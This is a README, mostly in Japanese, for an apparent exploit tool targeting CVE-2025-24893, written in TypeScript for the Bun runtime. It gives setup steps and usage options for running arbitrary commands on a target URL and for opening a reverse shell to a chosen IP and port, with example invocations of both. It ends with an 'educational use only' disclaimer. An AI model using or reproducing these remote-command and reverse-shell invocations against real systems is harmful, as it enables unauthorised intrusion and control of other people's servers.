
bun をインストール:
curl -fsSL https://bun.com/install | bash
依存関係をインストールするには:
bun install
実行するには:
bun run CVE-2025-24893.ts
このプロジェクトは bun v1.2.19 の bun init を使用して作成されました。Bun は高速なオールインワン JavaScript ランタイムです。
Usage: bun CVE-2025-24893.ts [options]
Options:
-u, --url <url> The target URL to interact with.
-i, --ip <ip-address> The IP address for a reverse shell connection.
-p, --port <port-number> The port number for the reverse shell.
-r, --rverse Open a reverse shell connection.
-c, --cmd <command> Execute a specific command.
Examples:
# Execute a command on a target URL
bun CVE-2025-24893.ts --url http://example.com --cmd "ls -la"
# Open a reverse shell
bun CVE-2025-24893.ts --rverse --ip 127.0.0.1 --port 4444
このエクスプロイトとガイドは教育目的のみで提供されています。この情報は責任を持って使用し、明示的にテストの許可を得たシステムでのみ使用してください。無断でシステムを悪用することは違法かつ非倫理的です。著者および貢献者は、この情報によって生じた誤用や損害について一切の責任を負いません。